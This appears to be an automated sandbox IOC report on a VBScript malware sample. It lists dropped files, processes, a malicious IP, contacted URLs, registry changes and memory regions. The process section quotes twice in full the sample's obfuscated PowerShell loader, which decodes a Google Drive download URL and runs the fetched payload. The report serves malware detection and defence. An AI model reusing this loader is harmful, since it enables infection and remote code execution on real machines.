IOC Report
Bnnebgers.vbs

loading gif

Files

File Path
Type
Category
Malicious
Bnnebgers.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ey4v2zi.ok2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gzubedel.xmm.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uecyenhh.sxt.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vzqw4cmq.vcz.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\188E93\31437F.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Roaming\188E93\31437F.lck
very short file (no magic)
dropped
C:\Users\user\AppData\Roaming\Assimileringens.Lan
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06
data
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Bnnebgers.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Frijsenborg Amateurism Knallertfreren Unplaiting #>;$Uniformsfrakke='tingene';<#Gaffelens Slgtsarv kommunevalgene Catalufas kalkeringens Skibsreders Pyrolysevrk #>;$Soundly=$host.PrivateData;If ($Soundly) {$Realters++;}function Burnets254($Sewings){$Noncataclysmic=$Bronzedren+$Sewings.Length-$Realters;for( $Hulede=5;$Hulede -lt $Noncataclysmic;$Hulede+=6){$Extratropical+=$Sewings[$Hulede];}$Extratropical;}function Iba($Charbroiled){ . ($Beslaglgning) ($Charbroiled);}$Aarendes=Burnets254 'SelvpMKapnioBeg az OpsaiThymylT.anslG anua Prim/Klyng5 Penu.Musta0perin Sch,o(EmbadWGldssiHaulanAns.ndStavnoMa wawTaaresoverf BaptNUbiquT rem Borg 1Uncon0Choko. dlis0Viktu;Nonvo ,spsWNussei aboonDob e6 vine4Un.ro;.erag SkamfxDrill6reuss4Natur;T.ght Hathr DousvCroqu:bouc 1Snapd2Byg.e1Lremi.Krens0Truck)Unort KarmiGOtt,keDezinco ergkStuttoEnera/ Fast2 Tryk0Slutv1N hed0F,dig0En er1Z osp0Mu.kl1Ir tt GuiluFFodgniRaulirAfooteOversfT lukosengexSprin/ Pref1 ille2R.fer1 Shar.Disap0 Inqu ';$Roskilde190=Burnets254 'confeuIntersChunkE SecorAab n-Mist aKalvegdahabeCohobNUnsetTFremt ';$Hyetograph=Burnets254 'AfkrihAdfrdtBugmutSnivepFri as,onst:Subve/Jagtl/ munddUsk,er R iniAm invBorsye onn.SlidsgToupeo Hyp oEnsilgChoralfr dleRecha.Proloc Bryso FiskmAbild/ FootuInorgcRosel?No,paeVocabx S ifpglo toHazierDiurnt ider=Ph lodpjathoBasiswRetennSlavilC,nopoUndgaaBalerdI gro& orfiStv,odSnitm= Lich1SkirpnBaadeqRedecj SagnXUnan M Hid.k CounuNidsty Sade0K,onjHNonsyQAnathzLegitkEurop_camoui,uttrG SepacBerkeo efirA E nsJAfkorbStineDAntisrSkrivbArchlsEstraZkjersjForreA SkrivSkrm x Kl eABunkrb Find ';$Kiasmers=Burnets254 'za fr>Styrt ';$Beslaglgning=Burnets254 'BoersI rdelEPraesXOv rv ';$Skibssidernes='Snarligt';$Rettelsesblad='\Assimileringens.Lan';Iba (Burnets254 ' earj$antihg konnlSkoleoG umpb Lycta Owenl Fnbl:MordaCLogiey .omblMylodiSugiln FraudLoadaeLakserpedeseSort r Bill=Nonsp$ AktieNephrn EkskvUa hn:Prluda Fs,epD,onqp,nobbdP.lsya yclotSammeaDipso+ arch$DatabR VinteElatet L,vetGlanse.yperlUnsucsFortreOveresMaelsbDesealCatalaHerhjdNonin ');Iba (Burnets254 ' lapp$SpinkgTvi llMediaoHe.heb.elesaHema lBeful:App eSIn.alc nurrrBrn pasketcwBetjelpremysak de=Mglin$ FradH U fryR,cureFla rtBursio llesgarve,rpseudaU.ennpSuverhBundv.KukkesP.melpSkulel KnusiSpanktAnari( obbl$FagblK Udebi,ingia F easBrovtmYmeree L ver angrsFrimu) M,cu ');Iba (Burnets254 'T erm[ D,agNSpr,ne ProbtSil c. nyprS Aq.aeSpi sr UnonvCor ciRa lecSubureD.belPN.ntao AlsmiTyrannTechntArranMBiltyaOvermnDobbeaDialogAnk eetricor Pinc] Nonc: .orr:a.kanSabonneTvangcPjas.uphtharMo tgi RrsmtNetvryun.ncPpicadrBarbaoinarctUnveroBrodechovedoUagtsl Per, de sk=Moder Bokma[uds aNRunkeeUnlyrtRe ak.Korr.Satione ubinc SexiuSlappr imbeiU diatArbejyHay.yPTilslrurt ko Tildt estaoUndutcAneu oEledol Per,TAut,syL.ttep Vipsesyned]Sjusk:Lodd.:.nsisT ymbilIkrafsCy,li1Trkni2 Dato ');$Hyetograph=$Scrawls[0];$Brnevold=(Burnets254 'Shudd$PrdikGEkspelSha eO Overb V nsaCoreglHande:Hvid i Um,dDAircoEAndvaOunderGFloppEPallbnAffejO Met UModulSL.ngw=DrikknPassaEHyperwSygel- OuncoTeglsb ,oguJP,ddeeSi icC odfuTSamme HistoSDr,geYUn elSStanitSte.seDav dmS ipj. DugpnElutrePoultTBilet.Ei htw He lEinchwb V,edcBedraLFiskeIArbejEMiljbNForskTHavre ');Iba ($Brnevold);Iba (Burnets254 'Jaege$Brugei BlsedUgeskeWeakeo tunng For eStvdrnProgroRadiuuJoyf sFster.CountH PinoeForziaOc,ondOpholeS ibsr Wa.nsLokal[ Ande$.viboRExteno StylsKarrykStyrgiAllerlResp.dUnchueNonre1Pukke9Bromi0P ten] Nonp= n nt$SynodAKri eaGigsfrSphaceBl sdnF,rbrdPandeeK,ritsD,kim ');$Stryges88=Burnets254 'Mowss$Miljtibre.fdC ckneSavelo R megBesagePu arnTacitoAutoruInexps Mand. to,aD OffeoDo.erwExtranSubmulTriamoDefeaaLiveddMiljbF CoeliVestelLa yve Seig(Bisul$Ri.hsHTelefy arebePatrit TurdoSystegD lprrMiliea rystpTigerhEspio,,tart$ ref PHastir TeddoFe.itxSkreseforl,n rbejeEuroetBervi) Sen ';$Proxenet=$Cylinderer;Iba (Burnets254 'Sodav$RecidGSpiflL S emOMlke.BT turaStroslRecir:AbstaA OverBFuddlYTuggeEbe ludPreha=Depor(TudseTBevgeEDispls,hototL tes-Badebp BeleAAdju tB topHJomfr Kvkk$ thypHero,R HaemOLavenX U reETimetNCoinseExcurt,atro)Filmn ');while (!$Abyed) {Iba (Burnets254 'Tangf$Pres.gPouchlGo,ifoPacifbProctaLumbrlMedia:DecalPRemicofunb,sForuriObovatC sariC.lluvEksisiChlo.sSlovetforeteArchinMarat=,emat$ ArmotTubberNonbiu RobieAot a ') ;Iba $Stryges88;Iba (Burnets254 ',adanSCollit Ariza AnelrSkruet Selv- KlbeS ndelHemateAndroeFri zpBukke Recr.4partr ');Iba (Burnets254 'Am.er$Gingeg U.gllBrddeoGarsibDisenaKonfolBogbr:Be.fiA DigibTittiyPrepaeEnd sdGenea=Pry,l(RosewT Phote abylsPhilotRdhov-BotanPVagtfa hirotDeli hI dst Downt$ uperPHemmerProp.oRevacxInstreBehann Ele.e SolatForhe)G ave ') ;Iba (Burnets254 'E,poi$OphavgUnheslDelkaoYokonbPerboa Oc.olSlem.:MikroRRollobCongrdT knoiGold.gHamatePilgrrPit ie fort= p us$TriumgFuglelpe ecoFofarbUndisa U,drlDefla:PuddlCBefolyfin,esSurtatZidaloI.dbls Mis.pAlarmaMbelfs apsom ,lou+Melod+folke% Cz.r$UnthiS P,ricSolarrBas.saAntndwLikablSwervsTaeni.Farvec eproFringuRegdnn Paratforl ') ;$Hyetograph=$Scrawls[$Rbdigere];}$Bemandingers=312136;$Baksningens=32559;Iba (Burnets254 'Brief$Aalekg rogrl FremoLaconb Embuatnde l Mill: MillKOffeniEncrimBenz ewoollrSuperiSi,ped evisg SnoriSkossa lokhnkaosj Fe.b=Tilk ChadaGKolo eTrskrtStbef-interCN umdoKnortnFo.tst,trigeHanken Unsat lith Bo il$Disp,PSaesorSneenoRe oixDayfleDisrunKetokeMaaletS,lla ');Iba (Burnets254 ' Skul$Rull.gFarvelUnu.toAuxocbV.redaKnsobl life:BouzoPMgt.grCentroHa ild Tan,uJunkikSporottypehu ForudForu v BesriRoyalkTilsjlRepute tarerDete.eSheetsSvige Shang=Auk i Repl[DuettSSno,byTllins rmout onteeOutpumHaveb. ryskCUdlgsoKamutndispovregreeMatchrEnsnatAlca ]Sudan:Slave:EjendFstaldr Incro estmLutetB utreaPenros UndeeCar,t6Pneum4 ljeS eptatPhymarEk.triBrevsn Pol,gSkvis(Ultim$StoreKTorskiNintum ilepe BalarD.triiBortrd SyrugSysteivizieaRensknBe be)Daudk ');Iba (Burnets254 'Tyros$ Agg g Ove l folkoTempobBarcoa UdsplProt : SkjtPNonineTranspHepatp RefleBasiarPentiwPauseoD rerrUdblstNort 4 G,nm Blost=Mul,i G,ne[GnallSPrin yPseudsGlycatplanteK,ttam Dio,.RadioTEklekeUn eaxRundetHuave.Drik.EAbbrenUdgancinagiopatacdAflevi StuvnK,nvegHasta] Slae: hitf:SivskA Min SProstCMurchIPaileIGlyco.nonheGTroldeDrilltOrthoSca,ast .litr FastiCeyl nRangfg egni(E,mer$DevilPNabo.rT areoS bcadpyramu Batik Applt Cragu Uno dl.rmev InfoiBantukforstlWaddieAtombrPyromeRestasAtte )Uraci ');Iba (Burnets254 ' Pryi$Fl.rigLin.elfatt.oS degbKombiaParoclSorbo:RegisS.rundcstemmrD tapu Tr,pt BegyaArthrtStrk oBegynrImput=under$Fe,emPDia.ee engpMedicpD,aloeNudamrJapanw.ayero,psolr Ballt .age4 abom. MellsBasinuInvalbTegnesMonottR adirSliveiBo genForskgSpec,(Pre o$SokleB Monoe UncamS natahemitn Besod FiltiD,zennHuskigImplue .ingr TrylsOccas,Sesq $ Bej.BP,agoaAnomakKumy,sVela,nLdig iKa minT ssagDivereTrldonKya,nsF,ott)Omreg ');Iba $Scrutator;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Frijsenborg Amateurism Knallertfreren Unplaiting #>;$Uniformsfrakke='tingene';<#Gaffelens Slgtsarv kommunevalgene Catalufas kalkeringens Skibsreders Pyrolysevrk #>;$Soundly=$host.PrivateData;If ($Soundly) {$Realters++;}function Burnets254($Sewings){$Noncataclysmic=$Bronzedren+$Sewings.Length-$Realters;for( $Hulede=5;$Hulede -lt $Noncataclysmic;$Hulede+=6){$Extratropical+=$Sewings[$Hulede];}$Extratropical;}function Iba($Charbroiled){ . ($Beslaglgning) ($Charbroiled);}$Aarendes=Burnets254 'SelvpMKapnioBeg az OpsaiThymylT.anslG anua Prim/Klyng5 Penu.Musta0perin Sch,o(EmbadWGldssiHaulanAns.ndStavnoMa wawTaaresoverf BaptNUbiquT rem Borg 1Uncon0Choko. dlis0Viktu;Nonvo ,spsWNussei aboonDob e6 vine4Un.ro;.erag SkamfxDrill6reuss4Natur;T.ght Hathr DousvCroqu:bouc 1Snapd2Byg.e1Lremi.Krens0Truck)Unort KarmiGOtt,keDezinco ergkStuttoEnera/ Fast2 Tryk0Slutv1N hed0F,dig0En er1Z osp0Mu.kl1Ir tt GuiluFFodgniRaulirAfooteOversfT lukosengexSprin/ Pref1 ille2R.fer1 Shar.Disap0 Inqu ';$Roskilde190=Burnets254 'confeuIntersChunkE SecorAab n-Mist aKalvegdahabeCohobNUnsetTFremt ';$Hyetograph=Burnets254 'AfkrihAdfrdtBugmutSnivepFri as,onst:Subve/Jagtl/ munddUsk,er R iniAm invBorsye onn.SlidsgToupeo Hyp oEnsilgChoralfr dleRecha.Proloc Bryso FiskmAbild/ FootuInorgcRosel?No,paeVocabx S ifpglo toHazierDiurnt ider=Ph lodpjathoBasiswRetennSlavilC,nopoUndgaaBalerdI gro& orfiStv,odSnitm= Lich1SkirpnBaadeqRedecj SagnXUnan M Hid.k CounuNidsty Sade0K,onjHNonsyQAnathzLegitkEurop_camoui,uttrG SepacBerkeo efirA E nsJAfkorbStineDAntisrSkrivbArchlsEstraZkjersjForreA SkrivSkrm x Kl eABunkrb Find ';$Kiasmers=Burnets254 'za fr>Styrt ';$Beslaglgning=Burnets254 'BoersI rdelEPraesXOv rv ';$Skibssidernes='Snarligt';$Rettelsesblad='\Assimileringens.Lan';Iba (Burnets254 ' earj$antihg konnlSkoleoG umpb Lycta Owenl Fnbl:MordaCLogiey .omblMylodiSugiln FraudLoadaeLakserpedeseSort r Bill=Nonsp$ AktieNephrn EkskvUa hn:Prluda Fs,epD,onqp,nobbdP.lsya yclotSammeaDipso+ arch$DatabR VinteElatet L,vetGlanse.yperlUnsucsFortreOveresMaelsbDesealCatalaHerhjdNonin ');Iba (Burnets254 ' lapp$SpinkgTvi llMediaoHe.heb.elesaHema lBeful:App eSIn.alc nurrrBrn pasketcwBetjelpremysak de=Mglin$ FradH U fryR,cureFla rtBursio llesgarve,rpseudaU.ennpSuverhBundv.KukkesP.melpSkulel KnusiSpanktAnari( obbl$FagblK Udebi,ingia F easBrovtmYmeree L ver angrsFrimu) M,cu ');Iba (Burnets254 'T erm[ D,agNSpr,ne ProbtSil c. nyprS Aq.aeSpi sr UnonvCor ciRa lecSubureD.belPN.ntao AlsmiTyrannTechntArranMBiltyaOvermnDobbeaDialogAnk eetricor Pinc] Nonc: .orr:a.kanSabonneTvangcPjas.uphtharMo tgi RrsmtNetvryun.ncPpicadrBarbaoinarctUnveroBrodechovedoUagtsl Per, de sk=Moder Bokma[uds aNRunkeeUnlyrtRe ak.Korr.Satione ubinc SexiuSlappr imbeiU diatArbejyHay.yPTilslrurt ko Tildt estaoUndutcAneu oEledol Per,TAut,syL.ttep Vipsesyned]Sjusk:Lodd.:.nsisT ymbilIkrafsCy,li1Trkni2 Dato ');$Hyetograph=$Scrawls[0];$Brnevold=(Burnets254 'Shudd$PrdikGEkspelSha eO Overb V nsaCoreglHande:Hvid i Um,dDAircoEAndvaOunderGFloppEPallbnAffejO Met UModulSL.ngw=DrikknPassaEHyperwSygel- OuncoTeglsb ,oguJP,ddeeSi icC odfuTSamme HistoSDr,geYUn elSStanitSte.seDav dmS ipj. DugpnElutrePoultTBilet.Ei htw He lEinchwb V,edcBedraLFiskeIArbejEMiljbNForskTHavre ');Iba ($Brnevold);Iba (Burnets254 'Jaege$Brugei BlsedUgeskeWeakeo tunng For eStvdrnProgroRadiuuJoyf sFster.CountH PinoeForziaOc,ondOpholeS ibsr Wa.nsLokal[ Ande$.viboRExteno StylsKarrykStyrgiAllerlResp.dUnchueNonre1Pukke9Bromi0P ten] Nonp= n nt$SynodAKri eaGigsfrSphaceBl sdnF,rbrdPandeeK,ritsD,kim ');$Stryges88=Burnets254 'Mowss$Miljtibre.fdC ckneSavelo R megBesagePu arnTacitoAutoruInexps Mand. to,aD OffeoDo.erwExtranSubmulTriamoDefeaaLiveddMiljbF CoeliVestelLa yve Seig(Bisul$Ri.hsHTelefy arebePatrit TurdoSystegD lprrMiliea rystpTigerhEspio,,tart$ ref PHastir TeddoFe.itxSkreseforl,n rbejeEuroetBervi) Sen ';$Proxenet=$Cylinderer;Iba (Burnets254 'Sodav$RecidGSpiflL S emOMlke.BT turaStroslRecir:AbstaA OverBFuddlYTuggeEbe ludPreha=Depor(TudseTBevgeEDispls,hototL tes-Badebp BeleAAdju tB topHJomfr Kvkk$ thypHero,R HaemOLavenX U reETimetNCoinseExcurt,atro)Filmn ');while (!$Abyed) {Iba (Burnets254 'Tangf$Pres.gPouchlGo,ifoPacifbProctaLumbrlMedia:DecalPRemicofunb,sForuriObovatC sariC.lluvEksisiChlo.sSlovetforeteArchinMarat=,emat$ ArmotTubberNonbiu RobieAot a ') ;Iba $Stryges88;Iba (Burnets254 ',adanSCollit Ariza AnelrSkruet Selv- KlbeS ndelHemateAndroeFri zpBukke Recr.4partr ');Iba (Burnets254 'Am.er$Gingeg U.gllBrddeoGarsibDisenaKonfolBogbr:Be.fiA DigibTittiyPrepaeEnd sdGenea=Pry,l(RosewT Phote abylsPhilotRdhov-BotanPVagtfa hirotDeli hI dst Downt$ uperPHemmerProp.oRevacxInstreBehann Ele.e SolatForhe)G ave ') ;Iba (Burnets254 'E,poi$OphavgUnheslDelkaoYokonbPerboa Oc.olSlem.:MikroRRollobCongrdT knoiGold.gHamatePilgrrPit ie fort= p us$TriumgFuglelpe ecoFofarbUndisa U,drlDefla:PuddlCBefolyfin,esSurtatZidaloI.dbls Mis.pAlarmaMbelfs apsom ,lou+Melod+folke% Cz.r$UnthiS P,ricSolarrBas.saAntndwLikablSwervsTaeni.Farvec eproFringuRegdnn Paratforl ') ;$Hyetograph=$Scrawls[$Rbdigere];}$Bemandingers=312136;$Baksningens=32559;Iba (Burnets254 'Brief$Aalekg rogrl FremoLaconb Embuatnde l Mill: MillKOffeniEncrimBenz ewoollrSuperiSi,ped evisg SnoriSkossa lokhnkaosj Fe.b=Tilk ChadaGKolo eTrskrtStbef-interCN umdoKnortnFo.tst,trigeHanken Unsat lith Bo il$Disp,PSaesorSneenoRe oixDayfleDisrunKetokeMaaletS,lla ');Iba (Burnets254 ' Skul$Rull.gFarvelUnu.toAuxocbV.redaKnsobl life:BouzoPMgt.grCentroHa ild Tan,uJunkikSporottypehu ForudForu v BesriRoyalkTilsjlRepute tarerDete.eSheetsSvige Shang=Auk i Repl[DuettSSno,byTllins rmout onteeOutpumHaveb. ryskCUdlgsoKamutndispovregreeMatchrEnsnatAlca ]Sudan:Slave:EjendFstaldr Incro estmLutetB utreaPenros UndeeCar,t6Pneum4 ljeS eptatPhymarEk.triBrevsn Pol,gSkvis(Ultim$StoreKTorskiNintum ilepe BalarD.triiBortrd SyrugSysteivizieaRensknBe be)Daudk ');Iba (Burnets254 'Tyros$ Agg g Ove l folkoTempobBarcoa UdsplProt : SkjtPNonineTranspHepatp RefleBasiarPentiwPauseoD rerrUdblstNort 4 G,nm Blost=Mul,i G,ne[GnallSPrin yPseudsGlycatplanteK,ttam Dio,.RadioTEklekeUn eaxRundetHuave.Drik.EAbbrenUdgancinagiopatacdAflevi StuvnK,nvegHasta] Slae: hitf:SivskA Min SProstCMurchIPaileIGlyco.nonheGTroldeDrilltOrthoSca,ast .litr FastiCeyl nRangfg egni(E,mer$DevilPNabo.rT areoS bcadpyramu Batik Applt Cragu Uno dl.rmev InfoiBantukforstlWaddieAtombrPyromeRestasAtte )Uraci ');Iba (Burnets254 ' Pryi$Fl.rigLin.elfatt.oS degbKombiaParoclSorbo:RegisS.rundcstemmrD tapu Tr,pt BegyaArthrtStrk oBegynrImput=under$Fe,emPDia.ee engpMedicpD,aloeNudamrJapanw.ayero,psolr Ballt .age4 abom. MellsBasinuInvalbTegnesMonottR adirSliveiBo genForskgSpec,(Pre o$SokleB Monoe UncamS natahemitn Besod FiltiD,zennHuskigImplue .ingr TrylsOccas,Sesq $ Bej.BP,agoaAnomakKumy,sVela,nLdig iKa minT ssagDivereTrldonKya,nsF,ott)Omreg ');Iba $Scrutator;"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://137.184.191.215/index.php/039
137.184.191.215
malicious
https://www.google.com
unknown
http://nuget.org/NuGet.exe
unknown
http://drive.usercontent.google.com
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://aka.ms/pscore6lB
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://drive.googP
unknown
https://drive.google.com
unknown
https://drive.usercontent.googh
unknown
https://drive.usercontent.google.com
unknown
https://drive.usercontent.google.com/pb
unknown
http://drive.google.com
unknown
https://aka.ms/pscore68
unknown
https://apis.google.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
https://drive.usercontent.google.com/Db
unknown
There are 13 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
drive.google.com
142.250.185.206
drive.usercontent.google.com
142.250.184.193

IPs

IP
Domain
Country
Malicious
137.184.191.215
unknown
United States
malicious
142.250.185.206
drive.google.com
United States
142.250.184.193
drive.usercontent.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\??????????????????????????????????
188E93
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
8BE0000
direct allocation
page execute and read and write
malicious
5FEB000
trusted library allocation
page read and write
malicious
1CA5698E000
trusted library allocation
page read and write
malicious
BE9C000
direct allocation
page execute and read and write
malicious
4E30000
heap
page execute and read and write
8B0B000
stack
page read and write
86B0000
trusted library allocation
page read and write
8730000
direct allocation
page read and write
8570000
heap
page read and write
8480000
heap
page read and write
89B5000
trusted library allocation
page read and write
71FE000
stack
page read and write
AA9C000
direct allocation
page execute and read and write
33E0000
trusted library allocation
page read and write
87C0000
heap
page read and write
1CA469A5000
trusted library allocation
page read and write
A09C000
direct allocation
page execute and read and write
77A6000
heap
page read and write
1CA48599000
trusted library allocation
page read and write
18BDA8BE000
heap
page read and write
18BDA939000
heap
page read and write
18BDA7F0000
heap
page read and write
2D9C000
stack
page read and write
3470000
heap
page read and write
18BDA93B000
heap
page read and write
F76739000
stack
page read and write
1CA474FA000
trusted library allocation
page read and write
1CA5EE76000
heap
page read and write
7FFD9BC20000
trusted library allocation
page read and write
18BDC630000
heap
page read and write
7FFD9BB10000
trusted library allocation
page read and write
7FFD9BC00000
trusted library allocation
page read and write
2DD9000
stack
page read and write
30B0000
heap
page read and write
18BDA946000
heap
page read and write
7FFD9B990000
trusted library allocation
page execute and read and write
1CA46DDB000
trusted library allocation
page read and write
7380000
direct allocation
page read and write
1CA5EEF9000
heap
page read and write
8C70000
trusted library allocation
page read and write
8600000
direct allocation
page read and write
1CA46B48000
trusted library allocation
page read and write
1CA5ED41000
heap
page read and write
23BED000
stack
page read and write
85F0000
direct allocation
page read and write
7B60000
trusted library allocation
page read and write
1CA44D30000
heap
page read and write
3460000
heap
page readonly
87C9000
heap
page read and write
7FFD9B8D4000
trusted library allocation
page read and write
30B9000
heap
page read and write
1CA44EC0000
heap
page read and write
18BDC5F7000
heap
page read and write
1CA467D4000
heap
page read and write
8780000
direct allocation
page read and write
7FFD9BB30000
trusted library allocation
page read and write
18BDA91A000
heap
page read and write
18BDC601000
heap
page read and write
F7750A000
stack
page read and write
1CA485B4000
trusted library allocation
page read and write
316D000
heap
page read and write
18BDA7F5000
heap
page read and write
33CD000
trusted library allocation
page execute and read and write
7FFD9BB70000
trusted library allocation
page read and write
18BDC5D0000
heap
page read and write
74B0000
heap
page read and write
1CA474CB000
trusted library allocation
page read and write
F7683E000
stack
page read and write
8857000
heap
page read and write
18BDC5FC000
heap
page read and write
85E0000
trusted library allocation
page read and write
7FFD9B8D2000
trusted library allocation
page read and write
F762FE000
stack
page read and write
8846000
heap
page read and write
3239000
heap
page read and write
18BDA87F000
heap
page read and write
8B90000
trusted library allocation
page execute and read and write
F764FE000
stack
page read and write
1CA46921000
trusted library allocation
page read and write
18BDA87A000
heap
page read and write
23FF0000
direct allocation
page read and write
1CA46DB5000
trusted library allocation
page read and write
87A0000
heap
page read and write
1CA44CE6000
heap
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
88A7000
heap
page read and write
1CA5EEF1000
heap
page read and write
18BDC5F0000
heap
page read and write
F7627E000
stack
page read and write
8841000
heap
page read and write
5FD1000
trusted library allocation
page read and write
F7738E000
stack
page read and write
1CA44CF7000
heap
page read and write
23AEE000
stack
page read and write
18BDA91D000
heap
page read and write
23F1E000
stack
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
3370000
heap
page read and write
8750000
heap
page read and write
33F5000
trusted library allocation
page execute and read and write
33EA000
trusted library allocation
page execute and read and write
2D2C000
remote allocation
page execute and read and write
1CA56C17000
trusted library allocation
page read and write
7C2B000
stack
page read and write
8BB0000
trusted library allocation
page read and write
8710000
direct allocation
page read and write
18BDA92A000
heap
page read and write
18BDC6DD000
heap
page read and write
7845000
heap
page read and write
4DCE000
stack
page read and write
1CA44C80000
trusted library allocation
page read and write
7FFD9BB20000
trusted library allocation
page read and write
8853000
heap
page read and write
7FFD9BB40000
trusted library allocation
page read and write
18BDA88D000
heap
page read and write
1CA4731B000
trusted library allocation
page read and write
88A3000
heap
page read and write
F7748D000
stack
page read and write
1CA485CE000
trusted library allocation
page read and write
7FFD9B986000
trusted library allocation
page read and write
1CA467C0000
heap
page read and write
5F2C000
remote allocation
page execute and read and write
8BA0000
trusted library allocation
page read and write
1CA5EE5F000
heap
page read and write
8CE0000
trusted library allocation
page execute and read and write
1CA470BB000
trusted library allocation
page read and write
18BDC708000
heap
page read and write
1CA474E9000
trusted library allocation
page read and write
7DF480510000
trusted library allocation
page execute and read and write
7B50000
trusted library allocation
page read and write
7B30000
trusted library allocation
page read and write
7B0D000
stack
page read and write
1CA5EE8D000
heap
page read and write
7B10000
trusted library allocation
page execute and read and write
5FE5000
trusted library allocation
page read and write
882D000
heap
page read and write
F763FF000
stack
page read and write
1CA44CA0000
heap
page read and write
1CA44E75000
heap
page read and write
E69C000
direct allocation
page execute and read and write
347B000
heap
page read and write
1CA468C7000
heap
page execute and read and write
18BDA92B000
heap
page read and write
692C000
remote allocation
page execute and read and write
76DE000
stack
page read and write
7B90000
trusted library allocation
page read and write
30B5000
heap
page read and write
C89C000
direct allocation
page execute and read and write
7FFD9B9B6000
trusted library allocation
page execute and read and write
4C90000
heap
page read and write
7968000
trusted library allocation
page read and write
1CA46DB1000
trusted library allocation
page read and write
7FFD9BAA0000
trusted library allocation
page execute and read and write
7FFD9BAB2000
trusted library allocation
page read and write
18BDC5D4000
heap
page read and write
320A000
heap
page read and write
86D0000
trusted library allocation
page read and write
7FFD9BAC0000
trusted library allocation
page execute and read and write
33F0000
trusted library allocation
page read and write
868E000
stack
page read and write
18BDA918000
heap
page read and write
6784FE000
stack
page read and write
1CA5EE20000
heap
page read and write
552C000
remote allocation
page execute and read and write
23EE0000
remote allocation
page read and write
7FFD9BC50000
trusted library allocation
page read and write
3390000
trusted library section
page read and write
8750000
direct allocation
page read and write
8700000
trusted library allocation
page read and write
1CA44D2E000
heap
page read and write
7340000
direct allocation
page read and write
7FFD9BC30000
trusted library allocation
page read and write
732C000
remote allocation
page execute and read and write
7BC0000
trusted library allocation
page read and write
4B2C000
remote allocation
page execute and read and write
18BDC5E8000
heap
page read and write
95F0000
direct allocation
page execute and read and write
7FFD9BAD0000
trusted library allocation
page read and write
18BDA88D000
heap
page read and write
723E000
stack
page read and write
1CA467DD000
heap
page read and write
77DC000
heap
page read and write
23F5F000
stack
page read and write
6787FE000
stack
page read and write
3410000
trusted library allocation
page read and write
345E000
stack
page read and write
880F000
heap
page read and write
4C80000
trusted library allocation
page execute and read and write
18BDC5E2000
heap
page read and write
1CA44D35000
heap
page read and write
18BDA94A000
heap
page read and write
1CA4859D000
trusted library allocation
page read and write
1CA46DAD000
trusted library allocation
page read and write
7290000
heap
page execute and read and write
7350000
direct allocation
page read and write
8770000
direct allocation
page read and write
18BDA88D000
heap
page read and write
7FFD9B8EB000
trusted library allocation
page read and write
33B0000
trusted library allocation
page read and write
8773000
heap
page read and write
